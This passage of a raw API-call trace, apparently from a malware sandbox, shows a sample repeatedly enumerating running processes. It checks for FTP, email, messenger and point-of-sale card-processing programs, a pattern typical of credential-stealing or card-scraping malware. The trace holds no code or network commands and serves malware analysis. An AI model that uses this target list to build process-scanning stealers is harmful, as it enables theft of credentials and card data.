szExeFile="against.exe")) returned 1 [0249.200] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0249.203] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0249.207] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0249.210] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0249.212] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0249.215] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0249.217] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0249.220] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0249.222] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0249.224] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0249.227] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0249.230] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0249.236] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0249.239] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0249.241] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0249.244] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0249.246] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0249.249] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0249.253] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0249.256] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0249.260] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0249.264] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0249.267] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0249.270] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0249.278] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0249.281] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0249.284] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0249.287] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0249.290] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0249.295] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0249.298] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0249.301] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0249.304] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0249.307] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0249.310] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0249.312] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0249.321] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0249.325] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0249.328] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0249.331] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0249.334] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0249.337] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0249.340] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0249.342] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0249.345] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0249.348] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0249.350] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0249.353] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0249.359] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0249.362] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0249.364] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0249.367] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0249.370] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0249.372] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0249.374] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0249.377] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0249.381] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0249.383] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0249.386] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0249.389] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0249.391] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0249.394] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0249.401] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0249.403] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0249.406] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0249.409] CloseHandle (hObject=0x2330) returned 1 [0249.409] Sleep (dwMilliseconds=0x64) [0249.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x233c [0249.531] Process32First (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.533] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0249.536] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0249.538] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.541] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0249.543] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.546] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0249.548] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0249.550] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0249.583] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.585] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.588] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0249.590] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.592] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.597] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.600] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.602] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.604] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.608] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.610] Process32Next (in: hSnapshot=0x233c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 